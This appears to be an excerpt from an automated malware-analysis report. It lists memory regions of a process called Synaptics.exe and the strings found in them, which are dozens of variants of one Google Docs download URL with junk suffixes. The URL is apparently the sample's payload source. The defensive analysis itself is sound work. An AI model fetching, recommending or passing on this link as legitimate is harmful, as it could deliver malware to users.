                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllq
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllxe
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlu
                              Source: Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmE
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmd
                              Source: Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmdn-c
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnele
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadneq
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng5
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniy
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor...
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnn
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado)
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoS
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadomN
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadordg
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpT
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpf)
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq(
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlu
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadul
